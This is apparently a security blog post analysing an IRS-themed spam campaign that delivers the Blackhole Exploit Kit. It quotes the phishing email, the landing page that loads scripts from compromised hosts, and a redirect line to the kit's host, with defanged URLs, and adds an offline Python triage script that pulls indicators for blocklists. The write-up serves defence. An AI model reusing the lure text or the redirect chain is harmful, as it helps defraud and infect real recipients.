Blackhole Exploit Kit (BHEK) present in IRS email notifications


The Blackhole Exploit Kit (BHEK) is now being pushed through emails that appear to come from the Internal Revenue Service (IRS). The emails tell the recipient that they have to validate their EIN in order to reaffirm their actual status.

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with subjects like:

IRS: Attention all business owners
IRS: For the attention of business owners
IRS: For the attention of entrepreneurs
IRS: Important Information
IRS: New taxation policies
IRS: Notice for business owners
IRS: Notification for business owners
We solve your IRS issues
We solve your IRS problems
…..

The email is sent from the spoofed address “****” and has the following body:

Internal Revenue Service (IRS)

Hello,

Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry to cause inconvenience.

For the details please refer to:
https://www.irs.gov/ClientArea.aspx?u=5EB79283FD

  • Email address: 77388b23@*********.com

Sincerely yours,
Esteban Meyers
IRS Customer Service representative


This email was sent to 77388b23@*********.com by: Internal Revenue Service (IRS) | Internal Revenue Service | 1111 Constitution Ave. N.W. | Washington DC 20535

The irs.gov link shown in the message actually points to hxxp://docencia.cl/bv8qKa/index.html, a landing page that requests two remote JavaScript files:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://meowchicago.net/HoYgaiVa/js.js"></script>
<script type="text/javascript" src="hxxp://www.physio-voss.at/DxAv5M4Y/js.js"></script>
</html>

The JavaScript (js.js) contains the following code, which redirects the browser to the host where the Blackhole Exploit Kit (BHEK) is active:

document.location='hxxp://1.howtobecomeabostonian.com/links/marked-alter.php';
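The chain described above (lure link whose visible irs.gov text hides a different href, a landing page pulling scripts from third-party hosts, and a script that does nothing but assign document.location) can be triaged statically from captured artefacts without ever fetching the malicious URLs. The script below is an added example written for this post, not MX Lab's own code or tooling. The three sample inputs are constructed from the defanged artefacts quoted above (the spam body is rebuilt as HTML with the real href behind the irs.gov text, which the post describes but does not show in source form); the function names and the `hxxp` refanging helper are assumptions of this example.

```python
"""Static triage of a mail-to-redirect chain (added example, not MX Lab code).

Nothing here touches the network: every input is a constructed sample built
from the defanged (hxxp) artefacts quoted in the post, and the functions only
parse text, so the script is safe to run offline.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the spam body as HTML: the visible text is the
# irs.gov address, the real href is the landing page (assumed markup).
SPAM_HTML = """<p>For the details please refer to:<br>
<a href="hxxp://docencia.cl/bv8qKa/index.html">https://www.irs.gov/ClientArea.aspx?u=5EB79283FD</a></p>"""

# The landing page as quoted in the post (defanged).
LANDING_URL = "hxxp://docencia.cl/bv8qKa/index.html"
LANDING_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://meowchicago.net/HoYgaiVa/js.js"></script>
<script type="text/javascript" src="hxxp://www.physio-voss.at/DxAv5M4Y/js.js"></script>
</html>"""

# Body of js.js as quoted in the post (defanged).
REDIRECT_JS = "document.location='hxxp://1.howtobecomeabostonian.com/links/marked-alter.php';"


def refang(url):
    """Turn a defanged hxxp:// or hxxps:// scheme back into one urlparse understands."""
    return re.sub(r"^hxxp", "http", url.strip(), flags=re.IGNORECASE)


class _LinkAndScriptParser(HTMLParser):
    """Collects [href, visible text] for <a> tags and src for <script> tags."""

    def __init__(self):
        super().__init__()
        self.links = []     # each entry is [href, visible text]
        self.scripts = []   # script src values in document order
        self._in_a = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append([a["href"], ""])
            self._in_a = True
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_data(self, data):
        if self._in_a and self.links:
            self.links[-1][1] += data

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_a = False


def find_mismatched_links(html):
    """(href, visible_text) pairs where the visible text is itself a URL whose
    host differs from the host the href really points to.  Non-URL link text
    such as "click here" has no host and is ignored."""
    p = _LinkAndScriptParser()
    p.feed(html)
    hits = []
    for href, text in p.links:
        shown = urlparse(refang(text)).netloc.lower()
        real = urlparse(refang(href)).netloc.lower()
        if shown and real and shown != real:
            hits.append((href, text.strip()))
    return hits


def external_script_hosts(html, page_url):
    """Hosts of <script src=...> tags that are not the landing page's own host."""
    p = _LinkAndScriptParser()
    p.feed(html)
    own = urlparse(refang(page_url)).netloc.lower()
    hosts = []
    for src in p.scripts:
        host = urlparse(refang(src)).netloc.lower()
        if host and host != own:
            hosts.append(host)
    return hosts


# document.location / window.location (optionally .href) assigned a literal.
_REDIRECT_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


def redirect_targets(js):
    """URLs assigned to the location object in a script body."""
    return _REDIRECT_RE.findall(js)


def triage_chain(spam_html, landing_html, landing_url, script_js):
    """Run all three checks and return the indicators worth blocking."""
    return {
        "lure_links": find_mismatched_links(spam_html),
        "script_hosts": external_script_hosts(landing_html, landing_url),
        "redirects": redirect_targets(script_js),
    }


if __name__ == "__main__":
    for key, value in triage_chain(SPAM_HTML, LANDING_HTML, LANDING_URL, REDIRECT_JS).items():
        print(key, value)
```

Each stage yields an indicator that can be fed to mail filtering or web proxy blocklists: the mismatched href host (docencia.cl), the two script hosts, and the final redirect host. The text/href comparison is the check most worth adding to a mail gateway, since it fires on the lure before the user ever reaches the landing page, and it stays silent on legitimate links where the displayed URL and the target agree.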

Again, as stated in other blog posts, do not follow any of these URLs and delete the message from your system.
